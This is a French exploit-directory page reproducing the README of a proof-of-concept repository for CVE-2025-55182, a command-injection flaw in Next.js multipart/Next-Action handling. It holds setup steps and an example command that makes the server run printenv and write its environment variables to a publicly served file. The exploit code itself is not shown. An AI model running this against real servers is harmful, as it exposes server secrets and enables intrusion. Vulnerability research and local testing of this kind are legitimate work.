Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Exploit de preuve de concept pour CVE-2025-55182 ciblant la gestion multipart/Next-Action de Next.js avec un script de démonstration d'injection de commandes locale. | Kitploit
Outils/GitHubGitHub/youneszddz/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubyouneszddz/cve-2025-55182

CVE-2025-55182

Exploit de preuve de concept pour CVE-2025-55182 ciblant la gestion multipart/Next-Action de Next.js avec un script de démonstration d'injection de commandes locale.

Voir le dépôt
7il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Nextjs POC

Un petit dépôt contenant :

  • test-app/ : une application de test Next.js 16 (React 19) utilisant le App Router.
  • exploit.js : un script local de preuve de concept utilisé pour démontrer et tester le comportement du serveur autour de la gestion de multipart/Next-Action. Destiné uniquement aux tests locaux.

Structure du dépôt

rsc-test-app/
├─ README.md                # You are here
├─ exploit.js               # PoC script (local-only)
└─ test-app/                # Next.js application
   ├─ app/                  # App Router pages
   ├─ public/               # Static assets (and env.txt when generated)
   ├─ package.json          # Next 16 / React 19
   └─ README.md             # Default Next.js template README

Prérequis

  • Node.js 18+ recommandé (testé avec Node 22)
  • npm (ou votre gestionnaire de paquets préféré)

Pour commencer (application Next.js)

  1. Installer les dépendances :
cd test-app
npm install
  1. Lancer le serveur de développement :
npm run dev
# App will be available at http://localhost:3000
  1. Construire et démarrer (production) :
npm run build
npm start

Script PoC local : exploit.js

Ce script construit une requête multipart avec un en-tête Next-Action pour tester le comportement du serveur. Par défaut, il tente d'exécuter une commande sur le processus serveur qui écrit l'environnement dans public/env.txt (pour démonstration dans un environnement local/de développement).

Remarques importantes :

  • Ceci est réservé aux tests locaux. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
  • Le script suppose que le répertoire de travail du serveur est aligné de sorte que public/ se résout sous test-app/public/.

Utilisation

Dans un terminal séparé, assurez-vous que l'application Next.js est en cours d'exécution sur http://localhost:3000 :

cd test-app
npm run dev

Depuis la racine du dépôt, exécutez le script :

node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"

Paramètres :

  • URL de base (optionnel) : par défaut http://localhost:3000.
  • Commande (optionnel) : par défaut sh -lc 'printenv > public/env.txt'.

Après exécution, vérifiez le fichier généré :

en accédant à

http://localhost:3000/env.txt

Et voilà les variables d'environnement du serveur.

Télécharger l’outil